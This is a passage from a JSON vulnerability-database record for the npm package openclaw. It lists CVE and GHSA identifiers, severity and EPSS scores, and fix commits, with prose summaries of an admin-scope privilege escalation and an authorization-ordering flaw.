"vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35667", "GHSA-3298-56p6-rpw2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cvxu-rdbu-abd2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91353?format=api", "vulnerability_id": "VCID-cwd3-ecym-sfaw", "summary": "OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n## Summary\n\nGateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`.\n\n## Fix Commit(s)\n\n- `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35645", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15986", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1603", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1604", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35645" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35645", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35645" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession" }, { "reference_url": "https://github.com/advisories/GHSA-h4jx-hjr3-fhgc", "reference_id": "GHSA-h4jx-hjr3-fhgc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h4jx-hjr3-fhgc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35645", "GHSA-h4jx-hjr3-fhgc" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cwd3-ecym-sfaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90977?format=api", "vulnerability_id": "VCID-cyj6-zyuh-qug6", "summary": "OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n## Summary\nTlon cite expansion happened before channel and DM authorization completed, allowing cite work and content handling before the final auth decision.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n- `ebee4e2210e1f282a982c7ef2ad79d77a572fc87`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now defers cite expansion until after authorization and preserves explicit empty-allowlist semantics.\n- extensions/tlon/src/monitor/utils.ts and extensions/tlon/src/security.test.ts ship the deferred cite expansion behavior and regressions.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35637", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.1803", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17991", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18028", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35637" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": 